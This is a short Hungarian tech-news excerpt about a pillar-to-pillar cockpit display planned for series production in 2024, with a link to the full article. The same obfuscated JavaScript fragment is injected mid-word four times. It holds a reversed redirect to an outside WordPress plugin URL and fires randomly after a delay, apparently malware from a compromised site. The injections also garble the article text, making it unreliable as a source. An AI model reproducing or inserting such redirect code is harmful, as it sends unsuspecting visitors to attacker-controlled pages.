A vezetői tér (cockpit) teljes szélességén átívelő megoldás kifejlesztésével a technológiai vállalat szisztematikusan viszi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovább az évek óta tartó, egyre nagyobb kijelzők felé mutató tendenciát. Az A-oszloptól egy másik oszlopig tartó integrált megjelenítés egyre több járműfunkciónak, digitális szolgáltatásnak, valamint kommunikációs, információs és szórakoztató alkalmazásnak biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosít helyet. A tervek szerint a sorozatgyártás 2024-ben kezdődik meg. A megoldásnak köszönhetően a kijelző a sofőr, az elöl ülő utas, valamint a digitális vezetési élmény központi vizuális felületévé válik. A nagy mennyiségben sorozatgyártoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott járműben történő bevezetés újabb mérföldkövet jelent abban a folyamatban, ahogyan az autó az IoT – dolgok internete – részeként egy okoseszközzé váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozik….
A cikk folytatódik: http://itmozaik.co.hu/tech/2021/07/12/ultraszeles-kijelzo-fokozza-a-digitalis-vezetesi-elmenyt.html
- Hirdetés -